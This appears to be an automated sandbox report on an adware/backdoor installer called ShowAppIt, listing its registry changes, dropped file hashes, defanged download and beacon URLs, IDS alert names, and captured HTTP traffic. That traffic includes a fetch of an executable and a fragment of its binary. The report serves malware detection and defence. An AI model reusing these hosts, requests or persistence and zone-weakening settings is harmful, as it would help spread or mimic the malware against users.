The Backdoor modifies IE security-zone settings to map all local web nodes without dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE security-zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Backdoor deletes the following registry key(s):
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process usetup.exe:644 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 73 B7 2F 82 A2 56 68 B2 B2 BD 61 AA 12 7C 23"
The process rundll32.exe:1252 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 46 59 BE DF 2A 76 08 D8 45 38 B4 73 A5 52 96"
The process rundll32.exe:1972 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 7D 7D 02 53 A7 32 B0 CC 8F 75 87 9C FA E5 F3"
The process Upd Inst.exe:1788 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"493c7345" = ""
[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"51d2f2ea" = "RPAj/YV/c/Ay/Xl/a//x/WV/cPAl/Y//alAf/YP/GPAf/B//VP/j/Cx/V/////%%"
"a1dcff5b" = "V/////%%"
"7f69fa1f" = "///%"
"340d3099" = "/P////%%"
"587b5709" = "V/////%%"
"a2e3b941" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\00000000]
"3efeb33e" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
"370856c7" = "p01e07x0qx1A06h0n01 06l0nU1Z06t0mU1g0640nl0S06h0nl1A06E0, p01e07x0qx1D06I0mU1O0640n01Y06t0ml1N06b0qx1S02I0ox1S06q0nU0%, p01e07x0qx1N06t0nl1h06O0jx1P06Y0mU1g0640nl0S06h0nl1A06E0, p01T07m0nl1Y06E0qx1h06x0qx1O0640mU1g0640nl0S06h0nl1A06E0"
[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c6c5dd44" = "V/////%%"
"2d71d5ab" = "V/////%%"
"8b9e4cbc" = "V/////%%"
"d94388d2" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"e8f9dcc7" = "UlAr/XJ/c//k////"
"3c09c42b" = "///%"
"a0743acc" = "N/////%%"
"6185d035" = "VP/h/CP/V//l////"
"fe94ce1e" = "V/////%%"
"1520c6f1" = "V/////%%"
"f1f24e29" = "Vl/l/C/////%"
"f0bf0bde" = "///%"
"1c311243" = "GxAy/YV/c/At/XD/c/Ay/XF/cPAj/YV/FlAy/X2/UxAp/X2/GxAk////"
"c99a5f5c" = "///%"
[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338]
"iiid" = "1"
[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"65114b36" = "Vl/l////"
"72758a5d" = "///%"
"37b7a6d8" = "UlAr/XJ/c//k////"
"0c230bcb" = "///%"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 7D 7C F1 DC 99 75 53 D2 9D 37 5C 4F B8 93 1C"
[HKU\.DEFAULT\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_916e5338\eae10f9d]
"c5705860" = "Vx////%%"
"d1abcdb6" = "///%"
"0e93c3f3" = "///%"
"f2c53c49" = "UlAr/XJ/c//k////"
"27ddcf6f" = "///%"
"414bc593" = "///%"
"0dc3ee96" = "/P////%%"
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"c24899a6" = "MP/f/CF/Mx/l/C/////%"
"bbf88800" = "///%"
"e46c271e" = "///%"
"060df2cd" = "G/Ay/YP/FPAt/X6/clAj/Xl/alAy/XP/blAs/XD/ax/j/Xt/axAv/X6////%"
"7367429f" = "///%"
The process Upd Inst.exe:212 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"Publisher" = "PremiumSoft"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"InstallDate" = "20131002"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"DisplayName" = "Upd Inst"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"_In" = "20141002"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"URLUpdateInfo" = ""
"NoRepair" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"DisplayVersion" = "3.3.0.1634"
"CategoryName" = "Apps"
[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 t p YmhabcdJfHSAepXR5o1j1c DKl8GWf2QPTqLd" = "NP6yu5 iJEHMZQIKEGoJNtaUn /KFIye81sQ"
"NP6yu5 oRN6utIKEG digPng1ySOBlAVHvZrTks5X3JZ0jUs" = "NP6yu5 o4IdosRJLFHmfwN6K"
"NP6yu5 xGCT2oqomjlV2gRnCoLMWn7nyn" = "NP6yu5 tQ3dtOHwysu7dAPo9rWzs6Cz73val5GwlYqnEmAXyKRiEzz 0sbZtS5"
"NP6yu5 mGooxrikg01VravP7V/5b68FyY" = "NP6yu5 xztvqomjlha"
"NP6yu5 s2TbxEefABCxJ0DAXr /fsJdEdZsSHr HV" = "NP6yu5 mKEMnTVNPRJuX1wT2IAlA/je9EmkVgWkIoJOav"
"NP6yu5 xegqyZTVNPRhap40RL5nzk9RVF fIgeuX" = "NP6yu5 ouLGsR/XZTVHZg6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"DisplayIcon" = "C:\Windows\System32\msiexec.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 06 1A B1 66 23 33 CD 88 68 BE F1 1F C5 6B 1D"
[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 iI0lv89/XZTpmaWCAW6XiF/xIowoplYxrEc" = "NP6yu5 z7vLgNfABCDER9"
"NP6yu5 upBrs456789yYTFdDrzVA0PJHl5GUN4cRRU6I0 /b" = "NP6yu5 ms6Kogvqomje5FgkwM"
"NP6yu5 rK2YdOCDWYSo sSZJb0LFNMK7umzJ4f" = "NP6yu5 o4IdosRJLFHmfwN6K"
"NP6yu5 pNrKTFbcdefEjL8Z1TlnENCpBpb" = "NP6yu5 tdyrj012345Z3fgj6z0y7u"
"NP6yu5 jO7cksRJLFHdItgO4" = "NP6yu5 ookVA701234YHM8"
"NP6yu5 t5w/eBhabcdLg7/sFSAaTxRvG" = "NP6yu5 xvTqlqdefABK 80Gq2mWBC1o0 "
"NP6yu5 sH9 Y xztvq/XYWHIi jTIOMPd" = "NP6yu5 nWYONZWYSUMmKdWHSyBsxoIXlq8L0acxfPYSvuyukjdQWYOTbm8kHsQ"
"NP6yu5 sFynDebcdef tMD" = "NP6yu5 zbMgbIcdefAUN"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"NoModify" = "1"
[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 u2C5SlhabcdKYXGD2X5Dtp " = "NP6yu5 nwsFq/lhabcDtvbbBGU mzaBnM/ JOhFVCSVs1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"SilentUninstall" = "c:\documents and settings\all users\application data\showappit\upd inst\upd inst.exe /uninstall"
[HKLM\SOFTWARE\Upd Inst\3301306948\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 xyxzUr xztv8XRDd4dOlw/ 0eLrMM" = "NP6yu5 p/RcQikg012CPtvY0JqomLb"
"NP6yu5 qnt FxztvqoDfBtS/GCPHJVoOIo2SDnPtKi" = "NP6yu5 yZKZjefABCDz76N9UmHe0p0kgH5NGRfwxzCZGcCt9/G/oGfA6jw"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-3301306948]
"UninstallString" = "c:\documents and settings\all users\application data\showappit\upd inst\upd inst.exe /uninstall"
"URLInfoAbout" = ""
The process %original file name%.exe:1936 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"EstimatedSize" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\TsuE7C96BC7.dll,"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"QuietUninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{25D79~1\Setup.exe /remove /q"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EBF539D0-F45C-4138-9756-F390D12471F8}]
"388" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"Language" = "1033"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"TizPath" = "c:\%original file name%.exe"
"VersionMajor" = "1"
"TSAware" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Fonts" = "%WinDir%\Fonts"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D 6A C7 8B 6F 5C 12 7B 83 5E 94 46 43 20 BA CC"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"Version" = "16777216"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"VersionMinor" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\14f2d95b-1790-416c-8056-e520a453e1b1]
"UninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{25D79~1\Setup.exe /remove /q0"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Addons]
"usetup.exe" = "usetup"
The Backdoor modifies IE security-zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Backdoor modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Backdoor modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Backdoor deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
Dropped PE files
| MD5 | File path |
|---|---|
| ce1318bd22fa94be9467011b74bb1a7f | c:\Documents and Settings\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Custom.dll |
| e717f6ce3a7429bfa6d7f3cf66737a4b | c:\Documents and Settings\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\Setup.exe |
| af7ce801c8471c5cd19b366333c153c4 | c:\Documents and Settings\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\TsuDll.dll |
| c2e76423f552080552e5da890254a610 | c:\Documents and Settings\All Users\Application Data\InstallMate\{25D7918D-19EA-4BA6-A94D-51C8FE34B37B}\_Setup.dll |
| deba33db167548f8bbac30f5d78eb168 | c:\Documents and Settings\All Users\Application Data\ShowAppIt\Upd Inst\Upd Inst.exe |
| 23912df27a61ea0463c5509ba6a97579 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe |
| deba33db167548f8bbac30f5d78eb168 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe |
| d4d1cc69e363813c14f289694756aa1e | c:\Program Files\Assistant.dll |
| 12f36f36188cbd24a4d601ccc9ef5e76 | c:\Program Files\AssistantSvc.dll |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: ShowAppIt
Product Name: ShowAppIt
Product Version: 1.0.0.3
Legal Copyright: Copyright (c) 2014 ShowAppIt
Legal Trademarks:
Original Filename: TSULoader.exe
Internal Name: TSULoader
File Version: 2014.9.14.1647
File Description: Installer for ShowAppIt
Comments: WinNT (x86) Unicode Lib Rel
Language: Language Neutral
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 7672 | 7680 | 4.5056 | b1ae6dcdc3a7ba319c6d5e0b1a2eadbc |
| .rdata | 12288 | 1794 | 2048 | 3.26018 | cd4f20f041a2da05dfe5974fe61bd4ec |
| .data | 16384 | 1040 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 20480 | 8288 | 8704 | 2.76251 | 842c41f3c116b14a898c99f76d414d8f |
| .reloc | 32768 | 348 | 512 | 2.09579 | 938152484b33bca77bd622973abb524e |
| .tsustub | 36864 | 120967 | 121344 | 5.54288 | 6bff97e7c4ba19b490b1f74f8560d6bb |
| .tsuarch | 159744 | 175616 | 175616 | 5.54447 | db78c3c938591436ec644f5f60a0165a |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 118
74e5ffa3b73f3ffe23841870340c5249
99aacc7fe4e3bc25f6d87a5c15ad6bc4
cc0d7947ba66f68266f5e9008a42a6f1
d668943e105742b1861ef8beaa329376
2c644688a5095d89445a26221cafd32d
26d79d3147c13a53a3b5cb1ee10f511f
4ee92b21f432a031f01dad629305ecab
1dbff8d6aa238ba053263e45e7b7c460
fdd3b5b1981b8e90105117061106afc3
8868c99f19b5e96e19e7e8f8e691a487
8e56f84263e44b2ac878bf49e69ffbb2
15c7d0a6048b63c48b20ef56b565e2ea
547395157e353df329b0db94ecf76ad1
04eb40fb002c14eb1dc6476e971e1c1b
2d770687d420395789c72fd6246f82da
b697b520cd1ecc186ccae823c92f8876
ff33cd0ac8a80ab1cac0fdd243bd5f2b
a0a1c71ac9a872f46e06d1d5aa700f8e
e66c7d74dea538d2f8ff84a75861c01d
ee7c3cf4b35ffd0a7323e6d76695a705
e16934c602e77233eca0d0974bc32b21
6d8cecff8d7ed822d940dbad5b59c0ea
6b1482f282b565ab814a1f5e3c095830
67a207a3c4a7c54e9ec18b18ebcba70b
5d94e6afee6c604582dcccc8ca2766d8
96e5b8b30c2410b2e339bdd71916466d
URLs
| URL | IP |
|---|---|
| hxxp://loversion.com/?report_version=5& | |
| hxxp://loversion.com/?step_id=1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A | |
| hxxp://loverse.org/addons/dfndr/180/tpq.exe | |
| hxxp://datadownloadscan.info/get/?data=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&version=4 | |
| hxxp://loversion.com/?step_id=1_1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A | |
| hxxp://loverse.org/addons/agup.exe | |
| hxxp://r1.loversion.com/?report_version=5& | |
| hxxp://c1.loversion.com/?step_id=1_1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A | |
| hxxp://c1.loversion.com/?step_id=1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A | |
| hxxp://i1.loverse.org/addons/agup.exe | |
| hxxp://i1.loverse.org/addons/dfndr/180/tpq.exe | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin
ET MALWARE W32/InstallRex.Adware Report CnC Beacon
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
Traffic
GET /get/?data=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&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: datadownloadscan.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Thu, 02 Oct 2014 00:37:50 GMT
Content-Length: 0
Connection: close
GET /?step_id=1&installer_id=1814450791079195389&publisher_id=388&source_id=0&page_id=0&affiliate_id=0&country_code=IN&locale=EN&browser_id=4&download_id=8833367967536364484&external_id=0&session_id=17892097720555666642&hardware_id=12802899647634509424&installer_file_name= Download now (64-bit)&sr=1&st=1&include_signature=0&uuid=%2A HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: c1.loversion.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: openresty
Date: Thu, 02 Oct 2014 00:37:37 GMT
Content-Type: text/html
Content-Length: 9098
Connection: close
Content-Disposition: attachment; filename="1.txt"..[.I.n.s.t.a.l.l.e.r.]...P.r.o.d.u.c.t.N.a.m.e.=.".S.e.t.u.p."...P.r.
o.d.u.c.t.V.e.r.s.i.o.n.=.".1...0."...P.r.o.d.u.c.t.C.o.d.e.=.".1.4.f.
2.d.9.5.b.-.1.7.9.0.-.4.1.6.c.-.8.0.5.6.-.e.5.2.0.a.4.5.3.e.1.b.1."...
P.u.b.l.i.s.h.e.r.I.D.=.".3.8.8."...S.o.u.r.c.e.I.D.=.".0."...P.a.g.e.
I.D.=.".0."...A.f.f.i.l.i.a.t.e.I.D.=.".0."...I.n.s.t.a.l.l.e.r.I.D.=.
".1.8.1.4.4.5.0.7.9.1.0.7.9.1.9.5.3.8.9."...L.o.c.a.l.e.=.".<.L.a.n
.g.u.a.g.e.>."...D.a.t.e.=.".2.0.1.4./.1.0./.0.2."...T.i.m.e.=.".0.
:.3.7.:.3.7."...S.h.o.w.I.n.T.a.s.k.b.a.r.=.".1."...H.i.d.e.S.c.r.e.e.
n.s.=.".0."...R.u.n.O.n.c.e.=.".1."...L.o.g.U.r.l.=."."...L.o.g.S.t.a.
r.t.e.d.=."."...L.o.g.F.i.n.i.s.h.e.d.=."."...L.o.g.B.e.f.o.r.e.S.e.n.
d.R.e.p.o.r.t.=."."...L.o.g.A.f.t.e.r.S.e.n.d.R.e.p.o.r.t.=.".".....[.
S.e.r.v.e.r.]...I.D.=.".3."...L.o.c.a.t.i.o.n.=.".D.E.".....[.U.s.e.r.
I.n.f.o.]...C.o.u.n.t.r.y.C.o.d.e.=.".I.N."...I.P.A.d.d.r.e.s.s.=.".1.
9.3...1.3.8...2.4.4...2.3.1."...W.e.b.B.r.o.w.s.e.r.=.".4.".....[.R.n.
d.G.e.n.]...P.e.r.c.e.n.t.a.g.e.=.".6.8.".....[.S.c.r.e.e.n.7.5.]...T.
i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".Y.e.s."...B.u.t.t.o.n.2.=.
".N.o."...L.a.b.e.l.1.=.".A.r.e. .y.o.u. .s.u.r.e.?."...[.S.c.r.e.e.n.
7.6.]...T.i.t.l.e.=.".S.e.t.u.p."...B.u.t.t.o.n.1.=.".T.r.y. .A.g.a.i.
n."...B.u.t.t.o.n.2.=.".C.a.n.c.e.l."...L.a.b.e.l.1.=.".W.e.'.r.e. .s.
o.r.r.y.:. .t.h.e. .d.o.w.n.l.o.a.d. .l.i.n.k. .s.e.e.m.s. .t.o. .b.e.
.b.r.o.k.e.n... .P.l.e.a.s.e. .v.i.s.i.t. .t.h.e. .a.u.t.h.o.r.'.s. .
h.o.m.e.p.a.g.e. .f.o.r. .f.u.r.t.h.e.r. .i.n.f.o.r.m.a.t.i.o.n...<<< skipped >>>
GET /addons/agup.exe HTTP/1.1
Accept: */*
User-Agent: TixDll
Host: i1.loverse.org
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Thu, 02 Oct 2014 00:37:35 GMT
Content-Type: application/octet-stream
Content-Length: 773632
Last-Modified: Wed, 17 Sep 2014 09:31:05 GMT
Connection: close
Accept-Ranges: bytesMZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......p.).4.G.4.G.
4.G.R!..7.G.=...5.G.....z.G...../.G.......G.=...1.G.=...%.G.4.F...G.R!
..'.G.4.G.6.G.R!..5.G.R!..5.G.Rich4.G.........................PE..L...
.8.T..................................................................
...P......|m...............................................@..<....
........................................................k..@..........
.....$............................text...............................
..`.rdata..............................@[email protected]...._.................
[email protected]...<....@......................@..@..............
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U...}..u.3.]..u.....
.Y].U...u......Y].U....\SVW.U....E..H..M..H8.M..H<[email protected]
..H....H..p K.].3.C.....M..H.K.e...M..H(.]..X0.M..H$.P4.M..H,.]..X..x.
.U..M..].#M..E.......M....P......s............C.].........;...........
... .......}...M...l...f..Q.].u..}..t3.M......DE..M.j...T...E.#E.Y*M..
..M.....i........]..M....sm...j.X.B. ..M.3.A............s..E..........
...E.........;.s........ ......f..... . ...... .f...A......r.......].;
]..U...#E. E..B..................... ..M.3..U.A...]...#]..].....U.<<< skipped >>>
POST /?report_version=5& HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: TixDll
Host: r1.loversion.com
Content-Length: 1781
Cache-Control: no-cache
